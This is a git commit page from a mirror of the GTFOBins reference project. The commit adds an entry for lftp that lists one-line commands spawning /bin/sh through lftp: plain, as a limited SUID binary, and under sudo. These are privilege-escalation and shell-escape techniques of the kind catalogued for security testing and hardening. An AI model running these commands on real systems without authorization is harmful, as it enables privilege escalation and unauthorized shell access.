mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Add lftp
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
parent
e357d8f73f
commit
53a34f3c47
9
_gtfobins/lftp.md
Normal file
9
_gtfobins/lftp.md
Normal file
@ -0,0 +1,9 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: lftp -c '!/bin/sh'
|
||||||
|
limited-suid:
|
||||||
|
- code: ./lftp -c '!/bin/sh'
|
||||||
|
sudo:
|
||||||
|
- code: sudo lftp -c '!/bin/sh'
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user